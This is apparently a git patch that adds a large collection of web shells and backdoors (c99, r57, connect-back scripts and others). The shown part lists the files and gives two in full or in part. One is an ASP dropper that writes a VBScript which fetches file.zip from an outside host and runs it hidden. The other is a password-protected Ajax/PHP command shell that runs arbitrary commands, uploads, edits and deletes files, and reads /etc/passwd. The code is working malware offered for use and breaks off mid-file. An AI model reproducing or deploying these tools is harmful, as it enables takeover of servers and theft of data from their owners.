From 6a88226bfd8a90659e24ee05dcc8b841f6d15d69 Mon Sep 17 00:00:00 2001
From: tennc <tennc@126.com>
Date: Wed, 5 Jun 2013 11:18:48 +0800
Subject: [PATCH] 138shell update

---
 138shell/A/Ajan.asp.txt                       |   30 +
 138shell/A/Ajax_PHP Command Shell.txt         |  646 ++
 138shell/A/Antichat Shell v1.3.txt            |  180 +
 138shell/A/Asmodeus v0.1.pl.txt               |  131 +
 .../A/Ayyildiz Tim  -AYT- Shell v 2.1 Biz.txt |  317 +
 138shell/A/aZRaiLPhp v1.0.txt                 |  284 +
 138shell/A/accept_language.txt                |    1 +
 138shell/B/Blind Shell.cpp.txt                |   72 +
 138shell/B/backdoor1.txt                      |  181 +
 138shell/B/backdoorfr.txt                     |  234 +
 138shell/B/backup.php.txt                     |   21 +
 138shell/B/backupsql.php.txt                  |  170 +
 138shell/B/backupsql.txt                      |  170 +
 138shell/C/CMD.asp.txt                        |   53 +
 138shell/C/Casus15.php.txt                    |  368 ++
 138shell/C/CmdAsp.asp.txt                     |   55 +
 138shell/C/Crystal.txt                        | 1127 ++++
 138shell/C/CyberSpy5.Asp.txt                  |    2 +
 138shell/C/c100.txt                           | 3595 +++++++++++
 138shell/C/c2007.php.txt                      | 3299 ++++++++++
 138shell/C/c99(1).php.txt                     | 2735 ++++++++
 138shell/C/c99.txt                            | 2927 +++++++++
 138shell/C/cgi-python.py.txt                  |  124 +
 138shell/C/connectback2.pl.txt                |   61 +
 138shell/C/ctt_sh.php.txt                     | 2927 +++++++++
 138shell/C/ctt_sh.txt                         | 2927 +++++++++
 138shell/C/cybershell.php.txt                 | 1033 +++
 138shell/C/cybershell.txt                     | 1033 +++
 138shell/D/DTool Pro.txt                      |  198 +
 .../Dive Shell 1.0 - Emperor Hacking Team.txt |  187 +
 138shell/D/Dx.php.txt                         | 2026 ++++++
 138shell/D/Dx.txt                             | 2026 ++++++
 138shell/D/DxShell_hk.php.txt                 | 2029 ++++++
 138shell/D/dC3 Security Crew Shell PRiV.txt   | 1273 ++++
 138shell/E/EFSO_2.asp.txt                     |   57 +
 138shell/E/Elmali Seker.asp.txt               | 2324 +++++++
 138shell/E/elmaliseker.asp.txt                | 2324 +++++++
 138shell/F/Fatalshell.php.txt                 |  283 +
 138shell/F/fuckphpshell.txt                   |  322 +
 .../G/GFS web-shell ver 3.1.7 - PRiV8.txt     |  618 ++
 138shell/G/gfs_sh.php.txt                     | 1575 +++++
 138shell/G/gfs_sh.txt                         | 1575 +++++
 138shell/H/h4ntu shell [powered by tsoi].txt  |   78 +
 138shell/I/Inderxer.asp.txt                   |   74 +
 138shell/I/iMHaPFtp.php.txt                   | 2061 ++++++
 138shell/I/iMHaPFtp.txt                       | 2061 ++++++
 138shell/I/img.php.txt                        | 2106 +++++++
 138shell/I/indexer.asp.txt                    |   74 +
 138shell/I/ironshell.txt                      |  588 ++
 138shell/J/Java Shell.js.txt                  |  125 +
 138shell/J/JspWebshell 1.2.txt                |  788 +++
 .../K/KAdot Universal Shell v0.1.6.html.txt   |  229 +
 138shell/K/Klasvayv.asp.txt                   |  901 +++
 ...Mode Command Execuriton Bypass Exploit.txt |   34 +
 138shell/L/lamashell.txt                      |   89 +
 138shell/L/load_shell.php.txt                 |  513 ++
 138shell/L/load_shell.txt                     |  513 ++
 138shell/L/lurm_safemod_on.cgi.txt            |   94 +
 .../Moroccan Spamers Ma-EditioN By GhOsT.txt  |  182 +
 .../M/MySQL Web Interface Version 0.8.txt     | 1302 ++++
 138shell/M/Mysql interface v1.0.txt           | 1166 ++++
 138shell/M/mailer3.php.txt                    |  182 +
 138shell/M/matamu.txt                         |  146 +
 138shell/M/myshell.php.txt                    |  420 ++
 138shell/M/mysql.php.txt                      | 1231 ++++
 138shell/M/mysql_shell.txt                    | 1169 ++++
 138shell/M/mysql_tool.php.txt                 | 1078 ++++
 138shell/N/NCC-Shell.txt                      |   60 +
 ...-SHELL v.0.5 alpha Lite Public Version.txt | 1480 +++++
 138shell/N/NT Addy.asp.txt                    | 1012 +++
 138shell/N/NetworkFileManagerPHP.txt          | 5603 +++++++++++++++++
 138shell/N/Nshell (1).php.txt                 |   66 +
 138shell/N/network.php.txt                    | 5603 +++++++++++++++++
 138shell/N/nshell.php.txt                     |  371 ++
 138shell/N/nstview.php.txt                    | 2136 +++++++
 138shell/N/ntdaddy.asp.txt                    | 1012 +++
 138shell/P/PH Vayv.php.txt                    |  597 ++
 138shell/P/PHANTASMA.txt                      |  634 ++
 138shell/P/PHP Backdoor Connect.pl.txt        |   61 +
 138shell/P/PHP Shell.php.txt                  | 1010 +++
 138shell/P/PHPRemoteView.txt                  | 2553 ++++++++
 138shell/P/Phyton Shell.py.txt                |  121 +
 138shell/P/Private-i3lue.txt                  | 1456 +++++
 138shell/P/pHpINJ.php.txt                     |   37 +
 138shell/P/perlbot.pl.txt                     |  687 ++
 138shell/P/php-backdoor.txt                   |   71 +
 138shell/P/php-include-w-shell.txt            | 1312 ++++
 138shell/P/phpbackdoor15.txt                  |  133 +
 138shell/P/phpjackal.txt                      | 1413 +++++
 138shell/P/phpshell17.txt                     |  177 +
 138shell/P/phvayv.php.txt                     |  597 ++
 138shell/P/pws.php.txt                        |   35 +
 138shell/P/pws.txt                            |   35 +
 138shell/P/ru24_post_sh.txt                   |   23 +
 138shell/R/Rader.asp.txt                      |  116 +
 138shell/R/Rem Exp.asp.txt                    |  250 +
 138shell/R/Rem View.php.txt                   | 2553 ++++++++
 138shell/R/Russian.php.txt                    |  229 +
 138shell/R/r57 Shell.php.txt                  | 1925 ++++++
 138shell/R/r57.php.txt                        | 2206 +++++++
 138shell/R/r577.php.txt                       | 1889 ++++++
 138shell/R/rootshell.txt                      |  349 +
 138shell/R/ru24_post_sh.php.txt               |   23 +
 138shell/README.md                            |    5 +
 ...er Shell -Safe Mod Bypass By Evilc0der.txt |  950 +++
 ...fe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.txt |   89 +
 138shell/S/Server Variables.asp.txt           |   27 +
 ...ker - Vrsion 1.0.0 - priv8 4 My friend.txt |  378 ++
 .../S/SimShell 1.0 - Simorgh Security MGZ.txt |  180 +
 138shell/S/Sincap.php.txt                     |  124 +
 138shell/S/SnIpEr_SA Shell.txt                | 2246 +++++++
 138shell/S/s.php.txt                          | 1887 ++++++
 138shell/S/s72 Shell v1.1 Coding.txt          |  141 +
 138shell/S/shell.php.txt                      |  146 +
 138shell/S/shellbot.pl.txt                    |  704 +++
 138shell/S/simple-backdoor.txt                |   17 +
 138shell/S/simple_cmd.txt                     |   18 +
 138shell/S/smtpd.py.txt                       |  549 ++
 138shell/S/spy.php.txt                        | 1889 ++++++
 138shell/S/sql.php.txt                        | 1169 ++++
 138shell/T/Test.php.txt                       |   13 +
 138shell/T/Tool.asp.txt                       |  792 +++
 138shell/T/telnet.cgi.txt                     |  697 ++
 138shell/T/telnet.pl.txt                      |  692 ++
 138shell/T/telnetd.pl.txt                     |  462 ++
 138shell/U/Uploader.php.txt                   |    9 +
 138shell/W/WebShell.cgi.txt                   |  869 +++
 138shell/W/WinX Shell.txt                     |  103 +
 138shell/W/Worse Linux Shell.txt              |   69 +
 138shell/W/w.php.txt                          | 2653 ++++++++
 138shell/W/w3d.php.txt                        |  128 +
 138shell/W/w4k.php.txt                        | 2830 +++++++++
 138shell/W/wacking.php.txt                    | 2830 +++++++++
 138shell/W/webshell.txt                       |  268 +
 138shell/X/xinfo.php.txt                      | 4820 ++++++++++++++
 138shell/Z/Zehir 4.asp.txt                    | 1190 ++++
 138shell/Z/zacosmall.php.txt                  |  501 ++
 138shell/Z/zacosmall.txt                      |  501 ++
 138shell/Z/zehir4.asp.txt                     | 1190 ++++
 139 files changed, 127695 insertions(+)
 create mode 100644 138shell/A/Ajan.asp.txt
 create mode 100644 138shell/A/Ajax_PHP Command Shell.txt
 create mode 100644 138shell/A/Antichat Shell v1.3.txt
 create mode 100644 138shell/A/Asmodeus v0.1.pl.txt
 create mode 100644 138shell/A/Ayyildiz Tim  -AYT- Shell v 2.1 Biz.txt
 create mode 100644 138shell/A/aZRaiLPhp v1.0.txt
 create mode 100644 138shell/A/accept_language.txt
 create mode 100644 138shell/B/Blind Shell.cpp.txt
 create mode 100644 138shell/B/backdoor1.txt
 create mode 100644 138shell/B/backdoorfr.txt
 create mode 100644 138shell/B/backup.php.txt
 create mode 100644 138shell/B/backupsql.php.txt
 create mode 100644 138shell/B/backupsql.txt
 create mode 100644 138shell/C/CMD.asp.txt
 create mode 100644 138shell/C/Casus15.php.txt
 create mode 100644 138shell/C/CmdAsp.asp.txt
 create mode 100644 138shell/C/Crystal.txt
 create mode 100644 138shell/C/CyberSpy5.Asp.txt
 create mode 100644 138shell/C/c100.txt
 create mode 100644 138shell/C/c2007.php.txt
 create mode 100644 138shell/C/c99(1).php.txt
 create mode 100644 138shell/C/c99.txt
 create mode 100644 138shell/C/cgi-python.py.txt
 create mode 100644 138shell/C/connectback2.pl.txt
 create mode 100644 138shell/C/ctt_sh.php.txt
 create mode 100644 138shell/C/ctt_sh.txt
 create mode 100644 138shell/C/cybershell.php.txt
 create mode 100644 138shell/C/cybershell.txt
 create mode 100644 138shell/D/DTool Pro.txt
 create mode 100644 138shell/D/Dive Shell 1.0 - Emperor Hacking Team.txt
 create mode 100644 138shell/D/Dx.php.txt
 create mode 100644 138shell/D/Dx.txt
 create mode 100644 138shell/D/DxShell_hk.php.txt
 create mode 100644 138shell/D/dC3 Security Crew Shell PRiV.txt
 create mode 100644 138shell/E/EFSO_2.asp.txt
 create mode 100644 138shell/E/Elmali Seker.asp.txt
 create mode 100644 138shell/E/elmaliseker.asp.txt
 create mode 100644 138shell/F/Fatalshell.php.txt
 create mode 100644 138shell/F/fuckphpshell.txt
 create mode 100644 138shell/G/GFS web-shell ver 3.1.7 - PRiV8.txt
 create mode 100644 138shell/G/gfs_sh.php.txt
 create mode 100644 138shell/G/gfs_sh.txt
 create mode 100644 138shell/H/h4ntu shell [powered by tsoi].txt
 create mode 100644 138shell/I/Inderxer.asp.txt
 create mode 100644 138shell/I/iMHaPFtp.php.txt
 create mode 100644 138shell/I/iMHaPFtp.txt
 create mode 100644 138shell/I/img.php.txt
 create mode 100644 138shell/I/indexer.asp.txt
 create mode 100644 138shell/I/ironshell.txt
 create mode 100644 138shell/J/Java Shell.js.txt
 create mode 100644 138shell/J/JspWebshell 1.2.txt
 create mode 100644 138shell/K/KAdot Universal Shell v0.1.6.html.txt
 create mode 100644 138shell/K/Klasvayv.asp.txt
 create mode 100644 138shell/L/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt
 create mode 100644 138shell/L/lamashell.txt
 create mode 100644 138shell/L/load_shell.php.txt
 create mode 100644 138shell/L/load_shell.txt
 create mode 100644 138shell/L/lurm_safemod_on.cgi.txt
 create mode 100644 138shell/M/Moroccan Spamers Ma-EditioN By GhOsT.txt
 create mode 100644 138shell/M/MySQL Web Interface Version 0.8.txt
 create mode 100644 138shell/M/Mysql interface v1.0.txt
 create mode 100644 138shell/M/mailer3.php.txt
 create mode 100644 138shell/M/matamu.txt
 create mode 100644 138shell/M/myshell.php.txt
 create mode 100644 138shell/M/mysql.php.txt
 create mode 100644 138shell/M/mysql_shell.txt
 create mode 100644 138shell/M/mysql_tool.php.txt
 create mode 100644 138shell/N/NCC-Shell.txt
 create mode 100644 138shell/N/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt
 create mode 100644 138shell/N/NT Addy.asp.txt
 create mode 100644 138shell/N/NetworkFileManagerPHP.txt
 create mode 100644 138shell/N/Nshell (1).php.txt
 create mode 100644 138shell/N/network.php.txt
 create mode 100644 138shell/N/nshell.php.txt
 create mode 100644 138shell/N/nstview.php.txt
 create mode 100644 138shell/N/ntdaddy.asp.txt
 create mode 100644 138shell/P/PH Vayv.php.txt
 create mode 100644 138shell/P/PHANTASMA.txt
 create mode 100644 138shell/P/PHP Backdoor Connect.pl.txt
 create mode 100644 138shell/P/PHP Shell.php.txt
 create mode 100644 138shell/P/PHPRemoteView.txt
 create mode 100644 138shell/P/Phyton Shell.py.txt
 create mode 100644 138shell/P/Private-i3lue.txt
 create mode 100644 138shell/P/pHpINJ.php.txt
 create mode 100644 138shell/P/perlbot.pl.txt
 create mode 100644 138shell/P/php-backdoor.txt
 create mode 100644 138shell/P/php-include-w-shell.txt
 create mode 100644 138shell/P/phpbackdoor15.txt
 create mode 100644 138shell/P/phpjackal.txt
 create mode 100644 138shell/P/phpshell17.txt
 create mode 100644 138shell/P/phvayv.php.txt
 create mode 100644 138shell/P/pws.php.txt
 create mode 100644 138shell/P/pws.txt
 create mode 100644 138shell/P/ru24_post_sh.txt
 create mode 100644 138shell/R/Rader.asp.txt
 create mode 100644 138shell/R/Rem Exp.asp.txt
 create mode 100644 138shell/R/Rem View.php.txt
 create mode 100644 138shell/R/Russian.php.txt
 create mode 100644 138shell/R/r57 Shell.php.txt
 create mode 100644 138shell/R/r57.php.txt
 create mode 100644 138shell/R/r577.php.txt
 create mode 100644 138shell/R/rootshell.txt
 create mode 100644 138shell/R/ru24_post_sh.php.txt
 create mode 100644 138shell/README.md
 create mode 100644 138shell/S/Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt
 create mode 100644 138shell/S/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.txt
 create mode 100644 138shell/S/Server Variables.asp.txt
 create mode 100644 138shell/S/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.txt
 create mode 100644 138shell/S/SimShell 1.0 - Simorgh Security MGZ.txt
 create mode 100644 138shell/S/Sincap.php.txt
 create mode 100644 138shell/S/SnIpEr_SA Shell.txt
 create mode 100644 138shell/S/s.php.txt
 create mode 100644 138shell/S/s72 Shell v1.1 Coding.txt
 create mode 100644 138shell/S/shell.php.txt
 create mode 100644 138shell/S/shellbot.pl.txt
 create mode 100644 138shell/S/simple-backdoor.txt
 create mode 100644 138shell/S/simple_cmd.txt
 create mode 100644 138shell/S/smtpd.py.txt
 create mode 100644 138shell/S/spy.php.txt
 create mode 100644 138shell/S/sql.php.txt
 create mode 100644 138shell/T/Test.php.txt
 create mode 100644 138shell/T/Tool.asp.txt
 create mode 100644 138shell/T/telnet.cgi.txt
 create mode 100644 138shell/T/telnet.pl.txt
 create mode 100644 138shell/T/telnetd.pl.txt
 create mode 100644 138shell/U/Uploader.php.txt
 create mode 100644 138shell/W/WebShell.cgi.txt
 create mode 100644 138shell/W/WinX Shell.txt
 create mode 100644 138shell/W/Worse Linux Shell.txt
 create mode 100644 138shell/W/w.php.txt
 create mode 100644 138shell/W/w3d.php.txt
 create mode 100644 138shell/W/w4k.php.txt
 create mode 100644 138shell/W/wacking.php.txt
 create mode 100644 138shell/W/webshell.txt
 create mode 100644 138shell/X/xinfo.php.txt
 create mode 100644 138shell/Z/Zehir 4.asp.txt
 create mode 100644 138shell/Z/zacosmall.php.txt
 create mode 100644 138shell/Z/zacosmall.txt
 create mode 100644 138shell/Z/zehir4.asp.txt

diff --git a/138shell/A/Ajan.asp.txt b/138shell/A/Ajan.asp.txt
new file mode 100644
index 0000000..e4ce66e
--- /dev/null
+++ b/138shell/A/Ajan.asp.txt
@@ -0,0 +1,30 @@
+<SCRIPT LANGUAGE="VBScript">
+<%
+Set entrika = CreateObject("Scripting.FileSystemObject")
+Set entrika = entrika.CreateTextFile("c:\net.vbs", True)
+entrika.write "Dim BinaryData" & vbcrlf
+entrika.write "Dim xml" & vbcrlf
+entrika.write "Set xml = CreateObject(""Microsoft.XMLHTTP"")" & vbcrlf
+entrika.write "xml.Open ""GET"",""http://www35.websamba.com/cybervurgun/file.zip"",False" & vbcrlf
+entrika.write "xml.Send" & vbcrlf
+entrika.write "BinaryData = xml.ResponsebOdy" & vbcrlf
+entrika.write "Const adTypeBinary = 1" & vbcrlf
+entrika.write "Const adSaveCreateOverWrite = 2" & vbcrlf
+entrika.write "Dim BinaryStream" & vbcrlf
+entrika.write "Set BinaryStream = CreateObject(""ADODB.Stream"")" & vbcrlf
+entrika.write "BinaryStream.Type = adTypeBinary" & vbcrlf
+entrika.write "BinaryStream.Open" & vbcrlf
+entrika.write "BinaryStream.Write BinaryData" & vbcrlf
+entrika.write "BinaryStream.SaveToFile ""c:\downloaded.zip"", adSaveCreateOverWrite" & vbcrlf
+entrika.write "Dim WshShell"  & vbcrlf
+entrika.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
+entrika.write "WshShell.Run ""c:\downloaded.zip"", 0, false" & vbcrlf
+entrika.close
+Set entrika = Nothing
+Set entrika = Nothing
+
+Dim WshShell
+Set WshShell = CreateObject("WScript.Shell")
+WshShell.Run "c:\net.vbs", 0, false
+%>
+ </SCRIPT>
\ No newline at end of file
diff --git a/138shell/A/Ajax_PHP Command Shell.txt b/138shell/A/Ajax_PHP Command Shell.txt
new file mode 100644
index 0000000..d08768a
--- /dev/null
+++ b/138shell/A/Ajax_PHP Command Shell.txt	
@@ -0,0 +1,646 @@
+<?php
+session_start();
+
+error_reporting(0);
+
+$password = "password";		 //Change this to your password ;)
+
+$version = "0.7B";
+
+$functions = array('Clear Screen' => 'ClearScreen()',
+'Clear History' => 'ClearHistory()',
+'Can I function?' => "runcommand('canirun','GET')",
+'Get server info' => "runcommand('showinfo','GET')",
+'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
+'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
+'Running processes' => "runcommand('ps -aux','GET')",
+'Readme' => "runcommand('shellhelp','GET')"
+
+);
+$thisfile = basename(__FILE__);
+
+$style = '<style type="text/css">
+.cmdthing {
+    border-top-width: 0px;
+    font-weight: bold;
+    border-left-width: 0px;
+    font-size: 10px;
+    border-left-color: #000000;
+    background: #000000;
+    border-bottom-width: 0px;
+    border-bottom-color: #FFFFFF;
+    color: #FFFFFF;
+    border-top-color: #008000;
+    font-family: verdana;
+    border-right-width: 0px;
+    border-right-color: #000000;
+}
+input,textarea {
+    border-top-width: 1px;
+    font-weight: bold;
+    border-left-width: 1px;
+    font-size: 10px;
+    border-left-color: #FFFFFF;
+    background: #000000;
+    border-bottom-width: 1px;
+    border-bottom-color: #FFFFFF;
+    color: #FFFFFF;
+    border-top-color: #FFFFFF;
+    font-family: verdana;
+    border-right-width: 1px;
+    border-right-color: #FFFFFF;
+}
+A:hover {
+text-decoration: none;
+}
+
+
+table,td,div {
+border-collapse: collapse;
+border: 1px solid #FFFFFF;
+}
+body {
+color: #FFFFFF;
+font-family: verdana;
+}
+</style>';
+$sess = __FILE__.$password;
+if(isset($_POST['p4ssw0rD']))
+{
+	if($_POST['p4ssw0rD'] == $password)
+	{
+		$_SESSION[$sess] = $_POST['p4ssw0rD'];
+	}
+	else
+	{
+		die("Wrong password");
+	}
+
+}
+if($_SESSION[$sess] == $password)
+{
+	if(isset($_SESSION['workdir']))
+	{
+			if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
+		{
+			chdir($_SESSION['workdir']);
+		}
+	}
+
+	if(isset($_FILES['uploadedfile']['name']))
+	{
+		$target_path = "./";
+		$target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 
+		if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
+			
+		}
+	}
+
+	if(isset($_GET['runcmd']))
+	{
+
+		$cmd = $_GET['runcmd'];
+
+		print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>";
+
+		if($cmd == "")
+		{
+			print "Empty Command..type \"shellhelp\" for some ehh...help";
+		}
+
+		elseif($cmd == "upload")
+		{
+			print '<br>Uploading to: '.realpath(".");
+			if(is_writable(realpath(".")))
+			{
+				print "<br><b>I can write to this directory</b>";
+			}
+			else
+			{
+				print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>";
+			}
+
+		}
+		elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
+		{
+				if(file_exists($file[1]) && is_dir($file[1]))
+				{
+					chdir($file[1]);
+					$_SESSION['workdir'] = $file[1];
+					print "Current directory changed to ".$file[1];
+				}
+			else
+			{
+				print "Directory not found";
+			}
+		}
+
+		elseif(strtolower($cmd) == "shellhelp")
+		{
+print '<b><font size=7>Ajax/PHP Command Shell</b></font>
+&copy; By Ironfist
+
+The shell can be used by anyone to command any server, the main purpose was
+to create a shell that feels as dynamic as possible, is expandable and easy
+to understand.
+
+If one of the command execution functions work, the shell will function fine. 
+Try the "canirun" command to check this.
+
+Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re 
+not used to these commands, google a little. 
+
+<b>Custom Functions</b>
+If you want to add your own custom command in the Quick Commands list, check 
+out the code. The $function array contains \'func name\' => \'javascript function\'.
+Take a look at the built-in functions for examples.
+
+I know this readme isn\'t providing too much information, but hell, does this shell
+even require one :P
+
+- Iron
+			';
+
+		}
+		elseif(ereg("editfile (.*)",$cmd,$file))
+		{
+			if(file_exists($file[1]) && !is_dir($file[1]))
+			{
+				print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">";
+				$contents = file($file[1]);
+					foreach($contents as $line)
+					{
+						print htmlspecialchars($line);
+					}
+				print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
+			}
+			else
+			{
+			print "File not found.";
+			}
+		}
+		elseif(ereg("deletefile (.*)",$cmd,$file))
+		{
+			if(is_dir($file[1]))
+			{
+				if(rmdir($file[1]))
+				{
+					print "Directory succesfully deleted.";
+				}
+				else
+				{
+					print "Couldn't delete directory!";
+				}
+			}
+			else
+			{
+				if(unlink($file[1]))
+				{
+					print "File succesfully deleted.";
+				}
+				else
+				{
+					print "Couldn't delete file!";
+				}
+			}
+		}
+		elseif(strtolower($cmd) == "canirun")
+		{
+		print "If any of these functions is Enabled, the shell will function like it should.<br>";
+			if(function_exists(passthru))
+			{
+				print "Passthru: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "Passthru: <b><font color=red>Disabled</b></font><br>";
+			}
+
+			if(function_exists(exec))
+			{
+				print "Exec: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "Exec: <b><font color=red>Disabled</b></font><br>";
+			}
+
+			if(function_exists(system))
+			{
+				print "System: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "System: <b><font color=red>Disabled</b></font><br>";
+			}
+			if(function_exists(shell_exec))
+			{
+				print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
+			}
+		print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>";
+		if( ini_get('safe_mode') ){
+			print "Safe Mode: <b><font color=red>Enabled</b></font>";
+		}
+			else
+		{
+			print "Safe Mode: <b><font color=green>Disabled</b></font>";
+		}
+		print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>";
+			if( ini_get('open_basedir') ){
+				print "Open_basedir: <b><font color=red>Enabled</b></font>";
+			}
+			else
+			{
+				print "Open_basedir: <b><font color=green>Disabled</b></font>";
+			}
+		}
+		//About the shell
+		elseif(ereg("listdir (.*)",$cmd,$directory))
+		{
+
+			if(!file_exists($directory[1]))
+			{
+				die("Directory not found");
+			}
+			//Some variables
+			chdir($directory[1]);
+			$i = 0; $f = 0;
+			$dirs = "";
+			$filez = "";
+			
+				if(!ereg("/$",$directory[1])) //Does it end with a slash?
+				{
+					$directory[1] .= "/"; //If not, add one
+				}
+			print "Listing directory: ".$directory[1]."<br>";
+			print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
+			
+			if ($handle = opendir($directory[1])) {
+			   while (false !== ($file = readdir($handle))) {
+				   if(is_dir($file))
+				   {
+					   $dirs[$i]  = $file;
+					   $i++;
+				   }
+				   else
+				   {
+					   $filez[$f] = $file;
+					   $f++;
+				   }
+				   
+			   }
+			   print "<td>";
+			   
+			   foreach($dirs as $directory)
+			   {
+					print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>";
+			   }
+			   
+			   print "</td><td>";
+			   
+			   foreach($filez as $file)
+			   {
+				print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>";
+			   }
+			   
+			   print "</td></table>";
+			}
+		}
+		elseif(strtolower($cmd) == "about")
+		{
+			print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
+		}
+		//Show info
+		elseif(strtolower($cmd) == "showinfo")
+		{
+			if(function_exists(disk_free_space))
+			{
+				$free = disk_free_space("/") / 1000000;
+			}
+			else
+			{
+				$free = "N/A";
+			}
+			if(function_exists(disk_total_space))
+			{
+				$total = trim(disk_total_space("/") / 1000000);
+			}
+			else
+			{
+				$total = "N/A";
+			}
+			$path = realpath (".");
+			
+			print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>";
+			
+			if(function_exists(passthru))
+			{
+				passthru("uname -a");
+			}
+			else
+			{
+				print "Passthru is disabled :(";
+			}
+		}
+		//Read /etc/passwd
+		elseif(strtolower($cmd) == "etcpasswdfile")
+		{
+
+			$pw = file('/etc/passwd/');
+			foreach($pw as $line)
+			{
+				print $line;
+			}
+
+
+		}
+		//Execute any other command
+		else
+		{
+
+			if(function_exists(passthru))
+			{
+				passthru($cmd);
+			}
+			else
+			{
+				if(function_exists(exec))
+				{
+					exec("ls -la",$result);
+					foreach($result as $output)
+					{
+						print $output."<br>";
+					}
+				}
+				else
+				{
+				if(function_exists(system))
+				{
+					system($cmd);
+				}
+				else
+				{
+					if(function_exists(shell_exec))
+					{
+						print shell_exec($cmd);
+					}
+						else
+						{
+						print "Sorry, none of the command functions works.";
+						}
+					}
+				}
+			}
+		}
+	}
+
+	elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
+	{
+		$file = $_POST['filetosave'];
+		if(!is_writable($file))
+		{
+			if(!chmod($file, 0777))
+			{
+				die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
+			}
+		}
+		
+		$fh = fopen($file, 'w');
+		$dt = $_POST['filecontent'];
+		fwrite($fh, $dt);
+		fclose($fh);
+	}
+	else
+	{
+?>
+<html>
+<title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title>
+<head>
+<?php print $style; ?>
+<SCRIPT TYPE="text/javascript">
+function sf(){document.cmdform.command.focus();}
+var outputcmd = "";
+var cmdhistory = "";
+function ClearScreen()
+{
+	outputcmd = "";
+	document.getElementById('output').innerHTML = outputcmd;
+}
+
+function ClearHistory()
+{
+	cmdhistory = "";
+	document.getElementById('history').innerHTML = cmdhistory;
+}
+
+function deletefile(file)
+{
+	deleteit = window.confirm("Are you sure you want to delete\n"+file+"?");
+	if(deleteit)
+	{
+		runcommand('deletefile ' + file,'GET');
+	}
+}
+
+var http_request = false;
+function makePOSTRequest(url, parameters) {
+  http_request = false;
+  if (window.XMLHttpRequest) {
+	 http_request = new XMLHttpRequest();
+	 if (http_request.overrideMimeType) {
+		http_request.overrideMimeType('text/html');
+	 }
+  } else if (window.ActiveXObject) {
+	 try {
+		http_request = new ActiveXObject("Msxml2.XMLHTTP");
+	 } catch (e) {
+		try {
+		   http_request = new ActiveXObject("Microsoft.XMLHTTP");
+		} catch (e) {}
+	 }
+  }
+  if (!http_request) {
+	 alert('Cannot create XMLHTTP instance');
+	 return false;
+  }
+  
+
+  http_request.open('POST', url, true);
+  http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+  http_request.setRequestHeader("Content-length", parameters.length);
+  http_request.setRequestHeader("Connection", "close");
+  http_request.send(parameters);
+}
+
+
+function SaveFile()
+{
+var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
+                    "&filecontent=" + encodeURI( document.getElementById("area1").value );
+makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
+document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly.";
+}
+
+function runcommand(urltoopen,action,contenttosend){
+cmdhistory = "<br>&nbsp;<i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory;
+document.getElementById('history').innerHTML = cmdhistory;
+if(urltoopen == "clear")
+{
+ClearScreen();
+}
+    var ajaxRequest;
+    try{
+        ajaxRequest = new XMLHttpRequest();
+    } catch (e){
+        try{
+            ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
+        } catch (e) {
+            try{
+                ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
+            } catch (e){
+                alert("Wicked error, nothing we can do about it...");
+                return false;
+            }
+        }
+    }
+    ajaxRequest.onreadystatechange = function(){
+        if(ajaxRequest.readyState == 4){
+        outputcmd = "<pre>"  + outputcmd + ajaxRequest.responseText +"</pre>";
+            document.getElementById('output').innerHTML = outputcmd;
+            var objDiv = document.getElementById("output");
+			objDiv.scrollTop = objDiv.scrollHeight;
+        }
+    }
+    ajaxRequest.open(action, "?runcmd="+urltoopen , true);
+	if(action == "GET")
+	{
+    ajaxRequest.send(null);
+	}
+    document.cmdform.command.value='';
+    return false;
+}
+
